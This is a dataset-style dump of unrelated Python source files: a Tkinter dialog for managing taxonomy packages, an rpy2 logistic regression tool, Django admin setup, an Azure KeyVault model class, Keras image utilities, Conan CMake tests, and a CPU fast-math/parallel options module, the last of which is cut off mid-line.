self.remappingsView.heading(\"#0\", text=_(\"Prefix\"))\n self.remappingsView[\"columns\"] = (\"remapping\")\n self.remappingsView.column(\"remapping\", width=500, anchor=\"w\", stretch=False)\n self.remappingsView.heading(\"remapping\", text=_(\"Remapping\"))\n \n # bottom frame package info details\n packageInfoFrame = Frame(frame, width=700)\n packageInfoFrame.columnconfigure(1, weight=1)\n \n self.packageNameLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\", \n font=font.Font(family='Helvetica', size=12, weight='bold'))\n self.packageNameLabel.grid(row=0, column=0, columnspan=6, sticky=W)\n self.packageVersionHdr = Label(packageInfoFrame, text=_(\"version:\"), state=DISABLED)\n self.packageVersionHdr.grid(row=1, column=0, sticky=W)\n self.packageVersionLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageVersionLabel.grid(row=1, column=1, columnspan=5, sticky=W)\n self.packageDescrHdr = Label(packageInfoFrame, text=_(\"description:\"), state=DISABLED)\n self.packageDescrHdr.grid(row=2, column=0, sticky=W)\n self.packageDescrLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageDescrLabel.grid(row=2, column=1, columnspan=5, sticky=W)\n self.packagePrefixesHdr = Label(packageInfoFrame, text=_(\"prefixes:\"), state=DISABLED)\n self.packagePrefixesHdr.grid(row=3, column=0, sticky=W)\n self.packagePrefixesLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packagePrefixesLabel.grid(row=3, column=1, columnspan=5, sticky=W)\n ToolTip(self.packagePrefixesLabel, text=_(\"List of prefixes that this package remaps.\"), wraplength=240)\n self.packageUrlHdr = Label(packageInfoFrame, text=_(\"URL:\"), state=DISABLED)\n self.packageUrlHdr.grid(row=4, column=0, sticky=W)\n self.packageUrlLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageUrlLabel.grid(row=4, column=1, columnspan=5, sticky=W)\n ToolTip(self.packageUrlLabel, text=_(\"URL of taxonomy package (local file path or web loaded file).\"), wraplength=240)\n self.packageDateHdr = Label(packageInfoFrame, text=_(\"date:\"), state=DISABLED)\n self.packageDateHdr.grid(row=5, column=0, sticky=W)\n self.packageDateLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageDateLabel.grid(row=5, column=1, columnspan=5, sticky=W)\n ToolTip(self.packageDateLabel, text=_(\"Date of currently loaded package file (with parenthetical node when an update is available).\"), wraplength=240)\n self.packageEnableButton = Button(packageInfoFrame, text=self.ENABLE, state=DISABLED, command=self.packageEnable)\n ToolTip(self.packageEnableButton, text=_(\"Enable/disable package.\"), wraplength=240)\n self.packageEnableButton.grid(row=6, column=1, sticky=E)\n self.packageMoveUpButton = Button(packageInfoFrame, text=_(\"Move Up\"), state=DISABLED, command=self.packageMoveUp)\n ToolTip(self.packageMoveUpButton, text=_(\"Move package up (above other remappings).\"), wraplength=240)\n self.packageMoveUpButton.grid(row=6, column=2, sticky=E)\n self.packageMoveDownButton = Button(packageInfoFrame, text=_(\"Move Down\"), state=DISABLED, command=self.packageMoveDown)\n ToolTip(self.packageMoveDownButton, text=_(\"Move package down (below other remappings).\"), wraplength=240)\n self.packageMoveDownButton.grid(row=6, column=3, sticky=E)\n self.packageReloadButton = Button(packageInfoFrame, text=_(\"Reload\"), state=DISABLED, command=self.packageReload)\n ToolTip(self.packageReloadButton, text=_(\"Reload/update package.\"), wraplength=240)\n self.packageReloadButton.grid(row=6, column=4, sticky=E)\n self.packageRemoveButton = Button(packageInfoFrame, text=_(\"Remove\"), state=DISABLED, command=self.packageRemove)\n ToolTip(self.packageRemoveButton, text=_(\"Remove package from packages table (does not erase the package file).\"), wraplength=240)\n self.packageRemoveButton.grid(row=6, column=5, sticky=E)\n packageInfoFrame.grid(row=2, column=0, columnspan=5, sticky=(N, S, E, W), padx=3, pady=3)\n packageInfoFrame.config(borderwidth=4, relief=\"groove\")\n \n okButton = Button(frame, text=_(\"Close\"), command=self.ok)\n ToolTip(okButton, text=_(\"Accept and changes (if any) and close dialog.\"), wraplength=240)\n cancelButton = Button(frame, text=_(\"Cancel\"), command=self.close)\n ToolTip(cancelButton, text=_(\"Cancel changes (if any) and close dialog.\"), wraplength=240)\n okButton.grid(row=3, column=3, sticky=(S,E), pady=3)\n cancelButton.grid(row=3, column=4, sticky=(S,E), pady=3, padx=3)\n \n enableDisableFrame = Frame(frame)\n enableDisableFrame.grid(row=3, column=1, sticky=(S,W), pady=3)\n enableAllButton = Button(enableDisableFrame, text=_(\"Enable All\"), command=self.enableAll)\n ToolTip(enableAllButton, text=_(\"Enable all packages.\"), wraplength=240)\n disableAllButton = Button(enableDisableFrame, text=_(\"Disable All\"), command=self.disableAll)\n ToolTip(disableAllButton, text=_(\"Disable all packages.\"), wraplength=240)\n enableAllButton.grid(row=1, column=1)\n disableAllButton.grid(row=1, column=2)\n \n self.loadTreeViews()\n\n self.geometry(\"+{0}+{1}\".format(dialogX+50,dialogY+100))\n frame.grid(row=0, column=0, sticky=(N,S,E,W))\n frame.columnconfigure(0, weight=0)\n frame.columnconfigure(1, weight=1)\n frame.rowconfigure(0, weight=1)\n window = self.winfo_toplevel()\n window.columnconfigure(0, weight=1)\n window.rowconfigure(0, weight=1)\n \n self.bind(\"\", self.ok)\n self.bind(\"\", self.close)\n \n self.protocol(\"WM_DELETE_WINDOW\", self.close)\n self.grab_set()\n self.wait_window(self)\n \n def loadTreeViews(self):\n self.selectedModule = None\n\n # clear previous treeview entries\n for previousNode in self.packagesView.get_children(\"\"): \n self.packagesView.delete(previousNode)\n\n for i, packageInfo in enumerate(self.packagesConfig.get(\"packages\", [])):\n name = packageInfo.get(\"name\", \"package{}\".format(i))\n node = self.packagesView.insert(\"\", \"end\", \"_{}\".format(i), text=name)\n self.packagesView.set(node, \"ver\", packageInfo.get(\"version\"))\n self.packagesView.set(node, \"status\", packageInfo.get(\"status\"))\n self.packagesView.set(node, \"date\", packageInfo.get(\"fileDate\"))\n if name in self.packageNamesWithNewerFileDates:\n self.packagesView.set(node, \"update\", _(\"available\"))\n self.packagesView.set(node, \"descr\", packageInfo.get(\"description\"))\n \n # clear previous treeview entries\n for previousNode in self.remappingsView.get_children(\"\"): \n self.remappingsView.delete(previousNode)\n\n for i, remappingItem in enumerate(sorted(self.packagesConfig.get(\"remappings\", {}).items())):\n prefix, remapping = remappingItem\n node = self.remappingsView.insert(\"\", \"end\", prefix, text=prefix)\n self.remappingsView.set(node, \"remapping\", remapping)\n \n self.packageSelect() # clear out prior selection\n\n def ok(self, event=None):\n if self.packagesConfigChanged:\n PackageManager.packagesConfig = self.packagesConfig\n PackageManager.packagesConfigChanged = True\n self.cntlr.onPackageEnablementChanged()\n self.close()\n \n def close(self, event=None):\n self.parent.focus_set()\n self.destroy()\n \n def packageSelect(self, *args):\n node = (self.packagesView.selection() or (None,))[0]\n try:\n nodeIndex = int(node[1:])\n except (ValueError, TypeError):\n nodeIndex = -1\n if 0 <= nodeIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][nodeIndex]\n self.selectedPackageIndex = nodeIndex\n name = packageInfo[\"name\"]\n self.packageNameLabel.config(text=name)\n self.packageVersionHdr.config(state=ACTIVE)\n self.packageVersionLabel.config(text=packageInfo[\"version\"])\n self.packageDescrHdr.config(state=ACTIVE)\n self.packageDescrLabel.config(text=packageInfo[\"description\"])\n self.packagePrefixesHdr.config(state=ACTIVE)\n self.packagePrefixesLabel.config(text=', '.join(packageInfo[\"remappings\"].keys()))\n self.packageUrlHdr.config(state=ACTIVE)\n self.packageUrlLabel.config(text=packageInfo[\"URL\"])\n self.packageDateHdr.config(state=ACTIVE)\n self.packageDateLabel.config(text=packageInfo[\"fileDate\"] + \" \" +\n (_(\"(an update is available)\") if name in self.packageNamesWithNewerFileDates else \"\"))\n self.packageEnableButton.config(state=ACTIVE,\n text={\"enabled\":self.DISABLE,\n \"disabled\":self.ENABLE}[packageInfo[\"status\"]])\n self.packageMoveUpButton.config(state=ACTIVE if 0 < nodeIndex else DISABLED)\n self.packageMoveDownButton.config(state=ACTIVE if nodeIndex < (len(self.packagesConfig[\"packages\"]) - 1) else DISABLED)\n self.packageReloadButton.config(state=ACTIVE)\n self.packageRemoveButton.config(state=ACTIVE)\n else:\n self.selectedPackageIndex = -1\n self.packageNameLabel.config(text=\"\")\n self.packageVersionHdr.config(state=DISABLED)\n self.packageVersionLabel.config(text=\"\")\n self.packageDescrHdr.config(state=DISABLED)\n self.packageDescrLabel.config(text=\"\")\n self.packagePrefixesHdr.config(state=DISABLED)\n self.packagePrefixesLabel.config(text=\"\")\n self.packageUrlHdr.config(state=DISABLED)\n self.packageUrlLabel.config(text=\"\")\n self.packageDateHdr.config(state=DISABLED)\n self.packageDateLabel.config(text=\"\")\n\n self.packageEnableButton.config(state=DISABLED, text=self.ENABLE)\n self.packageMoveUpButton.config(state=DISABLED)\n self.packageMoveDownButton.config(state=DISABLED)\n self.packageReloadButton.config(state=DISABLED)\n self.packageRemoveButton.config(state=DISABLED)\n \n def findLocally(self):\n initialdir = self.cntlr.pluginDir # default plugin directory\n if not self.cntlr.isMac: # can't navigate within app easily, always start in default directory\n initialdir = self.cntlr.config.setdefault(\"packageOpenDir\", initialdir)\n filename = self.cntlr.uiFileDialog(\"open\",\n parent=self,\n title=_(\"Choose taxonomy package file\"),\n initialdir=initialdir,\n filetypes=[(_(\"Taxonomy package files (*.zip)\"), \"*.zip\"),\n (_(\"PWD Manifest (taxonomyPackage.xml)\"), \"taxonomyPackage.xml\"),\n (_(\"pre-PWD Manifest (*.taxonomyPackage.xml)\"), \"*.taxonomyPackage.xml\"),\n (_(\"pre-PWD Oasis Catalog (*catalog.xml)\"), \"*catalog.xml\")],\n defaultextension=\".zip\")\n if filename:\n # check if a package is selected (any file in a directory containing an __init__.py\n self.cntlr.config[\"packageOpenDir\"] = os.path.dirname(filename)\n packageInfo = PackageManager.packageInfo(self.cntlr, filename, packageManifestName=self.manifestNamePattern)\n self.loadFoundPackageInfo(packageInfo, filename)\n \n\n def findOnWeb(self):\n url = DialogURL.askURL(self)\n if url: # url is the in-cache or local file\n packageInfo = PackageManager.packageInfo(self.cntlr, url, packageManifestName=self.manifestNamePattern)\n self.cntlr.showStatus(\"\") # clear web loading status\n self.loadFoundPackageInfo(packageInfo, url)\n \n def manifestName(self):\n self.manifestNamePattern = simpledialog.askstring(_(\"Archive manifest file name pattern\"),\n _(\"Provide non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \\n\"\n \"Uses unix file name pattern matching. \\n\"\n \"Multiple manifest files are supported in archive (such as oasis catalogs). \\n\"\n \"(If blank, search for either .taxonomyPackage.xml or catalog.xml). \"),\n initialvalue=self.manifestNamePattern,\n parent=self)\n \n def loadFoundPackageInfo(self, packageInfo, url):\n if packageInfo and packageInfo.get(\"name\"):\n self.addPackageInfo(packageInfo)\n self.loadTreeViews()\n else:\n messagebox.showwarning(_(\"Package is not itself a taxonomy package. \"),\n _(\"File does not itself contain a manifest file: \\n\\n{0}\\n\\n \"\n \"If opening an archive file, the manifest file search pattern currently is \\\"\\\", please press \\\"Manifest\\\" to change manifest file name pattern, e.g.,, \\\"*.taxonomyPackage.xml\\\", if needed. \")\n .format(url),\n parent=self)\n \n def removePackageInfo(self, name, version):\n # find package entry\n packagesList = self.packagesConfig[\"packages\"]\n j = -1\n for i, packageInfo in enumerate(packagesList):\n if packageInfo['name'] == name and packageInfo['version'] == version:\n j = i\n break\n if 0 <= j < len(packagesList):\n del self.packagesConfig[\"packages\"][i]\n self.packagesConfigChanged = True\n\n def addPackageInfo(self, packageInfo):\n name = packageInfo[\"name\"]\n version = packageInfo[\"version\"]\n self.removePackageInfo(name, version) # remove any prior entry for this package\n self.packageNamesWithNewerFileDates.discard(name) # no longer has an update available\n self.packagesConfig[\"packages\"].append(packageInfo)\n PackageManager.rebuildRemappings(self.cntlr)\n self.packagesConfigChanged = True\n\n def packageEnable(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][self.selectedPackageIndex]\n if self.packageEnableButton['text'] == self.ENABLE:\n packageInfo[\"status\"] = \"enabled\"\n self.packageEnableButton['text'] = self.DISABLE\n elif self.packageEnableButton['text'] == self.DISABLE:\n packageInfo[\"status\"] = \"disabled\"\n self.packageEnableButton['text'] = self.ENABLE\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def packageMoveUp(self):\n if 1 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packages = self.packagesConfig[\"packages\"]\n packageInfo = packages[self.selectedPackageIndex]\n del packages[self.selectedPackageIndex]\n packages.insert(self.selectedPackageIndex -1, packageInfo)\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def packageMoveDown(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]) - 1:\n packages = self.packagesConfig[\"packages\"]\n packageInfo = packages[self.selectedPackageIndex]\n del packages[self.selectedPackageIndex]\n packages.insert(self.selectedPackageIndex + 1, packageInfo)\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def packageReload(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][self.selectedPackageIndex]\n url = packageInfo.get(\"URL\")\n if url:\n packageInfo = PackageManager.packageInfo(self.cntlr, url, reload=True, packageManifestName=packageInfo.get(\"manifestName\"))\n if packageInfo:\n self.addPackageInfo(packageInfo)\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n self.cntlr.showStatus(_(\"{0} reloaded\").format(packageInfo.get(\"name\")), clearAfter=5000)\n else:\n messagebox.showwarning(_(\"Package error\"),\n _(\"File or package cannot be reloaded: \\n\\n{0}\")\n .format(url),\n parent=self)\n\n def packageRemove(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][self.selectedPackageIndex]\n self.removePackageInfo(packageInfo[\"name\"], packageInfo[\"version\"])\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def enableAll(self):\n self.enableDisableAll(True)\n \n def disableAll(self):\n self.enableDisableAll(False)\n \n def enableDisableAll(self, doEnable):\n for iPkg in range(len(self.packagesConfig[\"packages\"])):\n packageInfo = self.packagesConfig[\"packages\"][iPkg]\n if doEnable:\n packageInfo[\"status\"] = \"enabled\"\n self.packageEnableButton['text'] = self.DISABLE\n else:\n packageInfo[\"status\"] = \"disabled\"\n self.packageEnableButton['text'] = self.ENABLE\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n"} {"ext": "py", "sha": "1a30569524fe48b7b19699ba32d0e32ab5a2a404", "content": "#!/usr/bin/env python\n\n# from galaxy import eggs\nimport sys\n\nimport rpy2.rinterface as ri\nimport rpy2.rlike.container as rlc\n# from rpy import *\nimport rpy2.robjects as robjects\n\nr = robjects.r\n\n\ndef stop_err(msg):\n sys.stderr.write(msg)\n sys.exit()\n\n\ninfile = sys.argv[1]\ny_col = int(sys.argv[2]) - 1\nx_cols = sys.argv[3].split(\",\")\noutfile = sys.argv[4]\n\n\nprint(\"Predictor columns: %s; Response column: %d\" % (x_cols, y_col + 1))\nfout = open(outfile, \"w\")\nelems = []\nfor i, line in enumerate(file(infile)): # noqa F821\n line = line.rstrip(\"\\r\\n\")\n if len(line) > 0 and not line.startswith(\"#\"):\n elems = line.split(\"\\t\")\n break\n if i == 30:\n break # Hopefully we'll never get here...\n\nif len(elems) < 1:\n stop_err(\n \"The data in your input dataset is either missing or not formatted properly.\"\n )\n\ny_vals = []\nx_vals = []\nx_vector = []\nfor k, col in enumerate(x_cols):\n x_cols[k] = int(col) - 1\n x_vals.append([])\n\nNA = \"NA\"\nfor ind, line in enumerate(file(infile)): # noqa F821\n if line and not line.startswith(\"#\"):\n try:\n fields = line.split(\"\\t\")\n try:\n yval = float(fields[y_col])\n except Exception:\n yval = r(\"NA\")\n y_vals.append(yval)\n for k, col in enumerate(x_cols):\n try:\n xval = float(fields[col])\n except Exception:\n xval = r(\"NA\")\n x_vals[k].append(xval)\n x_vector.append(xval)\n except Exception as e:\n print(e)\n\n# x_vals1 = numpy.asarray(x_vals).transpose()\n\ncheck1 = 0\ncheck0 = 0\nfor i in y_vals:\n if i == 1:\n check1 = 1\n if i == 0:\n check0 = 1\nif check1 == 0 or check0 == 0:\n sys.exit(\"Warning: logistic regression must have at least two classes\")\n\nfor i in y_vals:\n if i not in [1, 0, r(\"NA\")]:\n print(str(i), file=fout)\n sys.exit(\n \"Warning: the current version of this tool can run only with two classes and need to be labeled as 0 and 1.\"\n )\n\n\n# dat= r.list(x=array(x_vals1), y=y_vals)\nnovif = 0\n# set_default_mode(NO_CONVERSION)\n# try:\n# linear_model = r.glm(r(\"y ~ x\"), data = r.na_exclude(dat),family=\"binomial\")\n# #r('library(car)')\n# #r.assign('dat',dat)\n# #r.assign('ncols',len(x_cols))\n# #r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family=\"binomial\")')).as_py()\n#\n# except Exception as rex:\n# stop_err(\"Error performing logistic regression on the input data.\\nEither the response column or one of the predictor columns contain only non-numeric or invalid values.\")\n\nfv = robjects.FloatVector(x_vector)\nm = r[\"matrix\"](fv, ncol=len(x_cols), byrow=True)\n# ensure order for generating formula\nod = rlc.OrdDict([(\"y\", robjects.FloatVector(y_vals)), (\"x\", m)])\ndat = robjects.DataFrame(od)\n# convert dat.names: [\"y\",\"x.1\",\"x.2\"] to formula string: 'y ~ x.1 + x.2'\nformula = \" + \".join(dat.names).replace(\"+\", \"~\", 1)\nprint(formula)\ntry:\n linear_model = r.glm(formula, data=r[\"na.exclude\"](dat), family=\"binomial\")\nexcept Exception:\n stop_err(\n \"Error performing linear regression on the input data.\\nEither the response column or one of the predictor columns contain only non-numeric or invalid values.\"\n )\n\nif len(x_cols) > 1:\n try:\n r(\"library(car)\")\n r.assign(\"dat\", dat)\n r.assign(\"ncols\", len(x_cols))\n # vif=r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family=\"binomial\")'))\n od2 = rlc.OrdDict([(\"datx\", m)])\n glm_data_frame = robjects.DataFrame(od2)\n glm_result = r.glm(\n \"dat$y ~ .\", data=r[\"na.exclude\"](glm_data_frame), family=\"binomial\"\n )\n print(\"Have glm\")\n vif = r.vif(glm_result)\n except Exception as rex:\n print(rex)\nelse:\n novif = 1\n\n# set_default_mode(BASIC_CONVERSION)\n\n# coeffs=linear_model.as_py()['coefficients']\ncoeffs = linear_model.rx2(\"coefficients\")\n# null_deviance=linear_model.as_py()['null.deviance']\nnull_deviance = linear_model.rx2(\"null.deviance\")[0]\n# residual_deviance=linear_model.as_py()['deviance']\nresidual_deviance = linear_model.rx2(\"deviance\")[0]\n# yintercept= coeffs['(Intercept)']\nyintercept = coeffs.rx2(\"(Intercept)\")[0]\n\nsummary = r.summary(linear_model)\n# co = summary.get('coefficients', 'NA')\nco = summary.rx2(\"coefficients\")\nprint(co)\n\"\"\"\nif len(co) != len(x_vals)+1:\n stop_err(\"Stopped performing logistic regression on the input data, since one of the predictor columns contains only non-numeric or invalid values.\")\n\"\"\"\n\ntry:\n yintercept = r.round(float(yintercept), digits=10)[0]\n # pvaly = r.round(float(co[0][3]), digits=10)\n pvaly = r.round(float(co.rx(1, 4)[0]), digits=10)[0]\nexcept Exception as e:\n print(str(e))\nprint(\"response column\\tc%d\" % (y_col + 1), file=fout)\ntempP = []\nfor i in x_cols:\n tempP.append(\"c\" + str(i + 1))\ntempP = \",\".join(tempP)\nprint(\"predictor column(s)\\t%s\" % (tempP), file=fout)\nprint(\"Y-intercept\\t%s\" % (yintercept), file=fout)\nprint(\"p-value (Y-intercept)\\t%s\" % (pvaly), file=fout)\n\nprint(coeffs)\nif len(x_vals) == 1: # Simple linear regression case with 1 predictor variable\n try:\n # slope = r.round(float(coeffs['x']), digits=10)\n raw_slope = coeffs.rx2(\"x\")[0]\n slope = r.round(float(raw_slope), digits=10)[0]\n except Exception:\n slope = \"NA\"\n try:\n # pval = r.round(float(co[1][3]), digits=10)\n pval = r.round(float(co.rx2(2, 4)[0]), digits=10)[0]\n except Exception:\n pval = \"NA\"\n print(\"Slope (c%d)\\t%s\" % (x_cols[0] + 1, slope), file=fout)\n print(\"p-value (c%d)\\t%s\" % (x_cols[0] + 1, pval), file=fout)\nelse: # Multiple regression case with >1 predictors\n ind = 1\n # while ind < len(coeffs.keys()):\n print(len(coeffs.names))\n while ind < len(coeffs.names):\n try:\n # slope = r.round(float(coeffs['x'+str(ind)]), digits=10)\n raw_slope = coeffs.rx2(\"x.\" + str(ind))[0]\n slope = r.round(float(raw_slope), digits=10)[0]\n except Exception:\n slope = \"NA\"\n print(\"Slope (c%d)\\t%s\" % (x_cols[ind - 1] + 1, slope), file=fout)\n\n try:\n # pval = r.round(float(co[ind][3]), digits=10)\n pval = r.round(float(co.rx2(ind + 1, 4)[0]), digits=10)[0]\n except Exception:\n pval = \"NA\"\n print(\"p-value (c%d)\\t%s\" % (x_cols[ind - 1] + 1, pval), file=fout)\n ind += 1\n\n# rsq = summary.get('r.squared','NA')\nrsq = summary.rx2(\"r.squared\")\nif rsq == ri.RNULLType():\n rsq = \"NA\"\nelse:\n rsq = rsq[0]\n\n\ntry:\n # rsq= r.round(float((null_deviance-residual_deviance)/null_deviance), digits=5)\n rsq = r.round(float((null_deviance - residual_deviance) / null_deviance), digits=5)[\n 0\n ]\n # null_deviance= r.round(float(null_deviance), digits=5)\n null_deviance = r.round(float(null_deviance), digits=5)[0]\n # residual_deviance= r.round(float(residual_deviance), digits=5)\n residual_deviance = r.round(float(residual_deviance), digits=5)[0]\n\nexcept Exception:\n pass\n\nprint(\"Null deviance\\t%s\" % (null_deviance), file=fout)\n\nprint(\"Residual deviance\\t%s\" % (residual_deviance), file=fout)\nprint(\"pseudo R-squared\\t%s\" % (rsq), file=fout)\nprint(\"\\n\", file=fout)\nprint(\"vif\", file=fout)\n\nif novif == 0:\n # py_vif=vif.as_py()\n count = 0\n for i in sorted(vif.names):\n print(\"c\" + str(x_cols[count] + 1), str(vif.rx2(i)[0]), file=fout)\n count += 1\nelif novif == 1:\n print(\"vif can calculate only when model have more than 1 predictor\", file=fout)\n"} {"ext": "py", "sha": "1a3057b5508f146d4372d9bbb5ae1f72c305925b", "content": "from django.contrib import admin\nfrom .models import Listing\n\nclass ListingAdmin(admin.ModelAdmin):\n list_display = ('id', 'title', 'is_published', 'price', 'list_date', 'realtor')\n list_display_links = ('id', 'title')\n list_filter = ('realtor',)\n list_editable = ('is_published',)\n search_fields = ('title', 'description', 'address', 'city', 'zipcode', 'price')\n list_per_page = 25\n\n\nadmin.site.register(Listing, ListingAdmin)"} {"ext": "py", "sha": "1a3057e7bf1790f7a33ff516356a2149953eee24", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass StorageAccountItem(Model):\n \"\"\"The storage account item containing storage account metadata.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar id: Storage identifier.\n :vartype id: str\n :ivar resource_id: Storage account resource Id.\n :vartype resource_id: str\n :ivar attributes: The storage account management attributes.\n :vartype attributes: ~azure.keyvault.models.StorageAccountAttributes\n :ivar tags: Application specific metadata in the form of key-value pairs.\n :vartype tags: dict[str, str]\n \"\"\"\n\n _validation = {\n 'id': {'readonly': True},\n 'resource_id': {'readonly': True},\n 'attributes': {'readonly': True},\n 'tags': {'readonly': True},\n }\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'str'},\n 'resource_id': {'key': 'resourceId', 'type': 'str'},\n 'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},\n 'tags': {'key': 'tags', 'type': '{str}'},\n }\n\n def __init__(self, **kwargs):\n super(StorageAccountItem, self).__init__(**kwargs)\n self.id = None\n self.resource_id = None\n self.attributes = None\n self.tags = None\n"} {"ext": "py", "sha": "1a30587df351cc55b048aef37b79c75f822eba8a", "content": "#!/usr/bin/python3\n\n\"\"\"\nCopyright 2018-2019 Firmin.Sun (fmsunyh@gmail.com)\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n# -----------------------------------------------------\n# @Time : 11/8/2018 4:54 PM\n# @Author : Firmin.Sun (fmsunyh@gmail.com)\n# @Software: ZJ_AI\n# -----------------------------------------------------\n# -*- coding: utf-8 -*-\nimport keras\nimport numpy as np\nimport cv2\nfrom PIL import Image\n\ndef read_image_bgr(path):\n '''\n :param path:\n :return: (h, w, 3)\n '''\n try:\n image = np.asarray(Image.open(path).convert('RGB'))\n except Exception as ex:\n print(path)\n\n return image[:, :, ::-1].copy()\n\ndef preprocess_image(x):\n # mostly identical to \"https://github.com/fchollet/keras/blob/master/keras/applications/imagenet_utils.py\"\n # except for converting RGB -> BGR since we assume BGR already\n x = x.astype(keras.backend.floatx())\n if keras.backend.image_data_format() == 'channels_first':\n if x.ndim == 3:\n x[0, :, :] -= 103.939\n x[1, :, :] -= 116.779\n x[2, :, :] -= 123.68\n else:\n x[:, 0, :, :] -= 103.939\n x[:, 1, :, :] -= 116.779\n x[:, 2, :, :] -= 123.68\n else:\n x[..., 0] -= 103.939\n x[..., 1] -= 116.779\n x[..., 2] -= 123.68\n\n return x\n\ndef resize_image(image, min_side=448, max_side=448):\n '''\n resize image to dsize\n :param img: input (h, w, 3) = (rows, cols, 3)\n :param size:\n :return: out (h, w, 3)\n '''\n (h, w, _) = image.shape\n\n scale = np.asarray((min_side, max_side),dtype=float) / np.asarray((h, w),dtype=float)\n\n # resize the image with the computed scale\n # cv2.resize(image, (w, h))\n img = cv2.resize(image, (min_side, max_side))\n\n return img, scale\n"} {"ext": "py", "sha": "1a3058ecaea4ad3eec37bbe8cab4192826efd69a", "content": "import os\nimport unittest\n\nimport pytest\nfrom nose.plugins.attrib import attr\n\nfrom conans.test.assets.multi_config import multi_config_files\nfrom conans.test.utils.tools import TestClient\n\n\n@attr(\"slow\")\n@pytest.mark.slow\n@pytest.mark.tool_cmake\nclass CMakeConfigsTest(unittest.TestCase):\n\n def test_test_package_configs(self):\n client = TestClient()\n name = \"Hello0\"\n files = multi_config_files(name, test=True)\n client.save(files, clean_first=True)\n\n client.run(\"create . user/testing\")\n self.assertIn(\"Hello Release Hello0\", client.out)\n self.assertIn(\"Hello Debug Hello0\", client.out)\n\n def test_cmake_multi(self):\n client = TestClient()\n\n deps = None\n for name in [\"Hello0\", \"Hello1\", \"Hello2\"]:\n files = multi_config_files(name, test=False, deps=deps)\n client.save(files, clean_first=True)\n deps = [name]\n if name != \"Hello2\":\n client.run(\"export . lasote/stable\")\n\n client.run('install . --build missing')\n client.run(\"build .\")\n cmd = os.sep.join([\".\", \"bin\", \"say_hello\"])\n client.run_command(cmd)\n self.assertIn(\"Hello Release Hello2 Hello Release Hello1 Hello Release Hello0\",\n \" \".join(str(client.out).splitlines()))\n client.run_command(cmd + \"_d\")\n self.assertIn(\"Hello Debug Hello2 Hello Debug Hello1 Hello Debug Hello0\",\n \" \".join(str(client.out).splitlines()))\n"} {"ext": "py", "sha": "1a3058fb23ba11df9eb6228e028a03afc4ae99c2", "content": "\"\"\"\nDefines CPU Options for use in the CPU target\n\"\"\"\n\n\nclass FastMathOptions(object):\n \"\"\"\n Options for controlling fast math optimization.\n \"\"\"\n\n def __init__(self, value):\n # https://releases.llvm.org/7.0.0/docs/LangRef.html#fast-math-flags\n valid_flags = {\n 'fast',\n 'nnan', 'ninf', 'nsz', 'arcp',\n 'contract', 'afn', 'reassoc',\n }\n\n if isinstance(value, FastMathOptions):\n self.flags = value.flags.copy()\n elif value is True:\n self.flags = {'fast'}\n elif value is False:\n self.flags = set()\n elif isinstance(value, set):\n invalid = value - valid_flags\n if invalid:\n raise ValueError(\"Unrecognized fastmath flags: %s\" % invalid)\n self.flags = value\n elif isinstance(value, dict):\n invalid = set(value.keys()) - valid_flags\n if invalid:\n raise ValueError(\"Unrecognized fastmath flags: %s\" % invalid)\n self.flags = {v for v, enable in value.items() if enable}\n else:\n msg = \"Expected fastmath option(s) to be either a bool, dict or set\"\n raise ValueError(msg)\n\n def __bool__(self):\n return bool(self.flags)\n\n __nonzero__ = __bool__\n\n def __repr__(self):\n return f\"FastMathOptions({self.flags})\"\n\n\nclass ParallelOptions(object):\n \"\"\"\n Options for controlling auto parallelization.\n \"\"\"\n\n def __init__(self, value):\n if isinstance(value, bool):\n self.enabled = value\n self.comprehension = value\n self.reduction = value\n self.inplace_binop = value\n self.setitem = value\n self.numpy = value\n self.stencil = value\n self.fusion = value\n self.prange = value\n elif isinstance(value, dict):\n self.enabled = True\n self.comprehension = value.pop('comprehension', True)\n self.reduction = value.pop('reduction', True)\n self.inplace_binop = 